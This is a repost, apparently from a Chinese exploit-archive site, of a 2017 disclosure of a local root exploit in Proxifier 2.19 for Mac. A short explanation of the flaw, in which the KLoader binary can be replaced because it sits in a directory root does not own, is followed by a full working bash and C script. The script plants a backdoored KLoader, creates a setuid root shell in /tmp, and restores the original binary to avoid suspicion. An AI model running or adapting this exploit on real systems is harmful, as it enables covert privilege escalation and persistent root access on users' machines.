首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Proxifier 2.19 Privilege Escalation / Code Execution
来源:https://m4.rkw.io 作者:Wadham 发布时间:2017-04-13  
With CVE-2017-7643 I disclosed a command injection vulnerablity in the 
KLoader
binary that ships with Proxifier <= 2.18.

Unfortunately 2.19 is also vulnerable to a slightly different attack 
that
yields the same result.

When Proxifier is first run, if the KLoader binary is not suid root it 
gets
executed as root by Proxifier.app (the user is prompted to enter an 
admin
password).  The KLoader binary will then make itself suid root so that 
it
doesn't need to prompt the user again.

The Proxifier developers added parameter sanitisation and kext signature
verification to the KLoader binary as a fix for CVE-2017-7643 but 
Proxifier.app
does no verification of the KLoader binary that gets executed as root.

The directory KLoader sits in is not root-owned so we can replace it 
with
our own binary that will get executed as root when Proxifier starts.

To avoid raising any suspicion, as soon we get executed as root we can 
swap
the real KLoader binary back into place and forward the execution call 
on
to it.  It does require the user to re-enter their credentials the next 
time
Proxifier is run but it's likely most users wouldn't think anything of 
this.

Users should upgrade to version 2.19.2.

https://m4.rkw.io/proxifier_privesc_219.sh.txt
3e30f1c7ea213e0ae1f4046e1209124ee79a5bec479fa23d0b2143f9725547ac
-------------------------------------------------------------------

#!/bin/bash

#####################################################################
# Local root exploit for vulnerable KLoader binary distributed with #
# Proxifier for Mac v2.19                                           #
#####################################################################
# by m4rkw,  shouts to #coolkids :P                                 #
#####################################################################

cat > a.c <<EOF
#include <stdio.h>
#include <unistd.h>

int main()
{
   setuid(0);
   seteuid(0);

   execl("/bin/bash", "bash", NULL);
   return 0;
}
EOF

gcc -o /tmp/a a.c

cat > a.c <<EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main(int ac, char *av[])
{
   if (geteuid() != 0) {
     printf("KLoader: UID not set to 0\n");
     return 104;
   } else {
     seteuid(0);
     setuid(0);

     chown("/tmp/a", 0, 0);
     chmod("/tmp/a", strtol("4755", 0, 8));
     rename("/Applications/Proxifier.app/Contents/KLoader2", 
"/Applications/Proxifier.app/Contents/KLoader");
     chown("/Applications/Proxifier.app/Contents/KLoader", 0, 0);
     chmod("/Applications/Proxifier.app/Contents/KLoader", 
strtol("4755", 0, 8));
     execv("/Applications/Proxifier.app/Contents/KLoader", av);

     return 0;
   }
}
EOF

mv -f /Applications/Proxifier.app/Contents/KLoader 
/Applications/Proxifier.app/Contents/KLoader2
gcc -o /Applications/Proxifier.app/Contents/KLoader a.c
rm -f a.c

echo "Backdoored KLoader installed, the next time Proxifier starts 
/tmp/a will become suid root."

-------------------------------------------------------------------



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Apple WebKit - 'JSC::SymbolTab
·XiongMai uc-http 1.0.0 Local F
·Apple WebKit - 'Document::adop
·PCMAN FTP Server 2.0.7 ACCT Bu
·Apple WebKit - 'JSC::B3::Proce
·PCMAN FTP Server 2.0.7 GET Buf
·Apple WebKit / Safari 10.0.3 (
·PCMAN FTP Server 2.0.7 NLST Bu
·Apple WebKit / Safari 10.0.3 (
·PCMAN FTP Server 2.0.7 MKD Buf
·Brother MFC-J6520DW - Authenti
·Adobe Creative Cloud Desktop A
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved